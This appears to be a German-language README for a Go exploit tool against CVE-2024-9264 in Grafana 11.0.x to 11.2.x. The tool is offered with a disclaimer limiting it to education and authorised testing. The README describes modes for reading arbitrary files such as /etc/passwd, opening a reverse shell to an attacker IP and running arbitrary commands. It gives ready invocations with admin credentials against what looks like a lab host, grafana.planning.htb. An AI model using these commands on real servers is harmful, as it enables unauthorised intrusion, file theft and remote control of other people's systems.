
Eine Go-Implementierung für CVE-2024-9264, die Grafana-Versionen 11.0.x, 11.1.x und 11.2.x betrifft.
Exploit-Tool für CVE-2024-9264, eine kritische Schwachstelle in Grafana, die es authentifizierten Angreifern ermöglicht, SQL-Abfragen auszuführen, was zu RCE führt
🛡️ Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests bestimmt.
Unautorisierte Nutzung ist illegal und unethisch.
CVE-2024-9264 ist ein kritischer Fehler in Grafana, der es authentifizierten Angreifern ermöglicht, SQL-Befehle auszuführen, was zu RCE und Datei-Lesen führt.
file – Beliebige Dateien lesen (z. B. /etc/passwd)shell – Reverse Shell zum Angreifer-Rechnercommand – Beliebige Shell-Befehle ausführen (z. B. whoami)
Nicht alle Argumente sind erforderlich.
go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'
go run main.go [flags]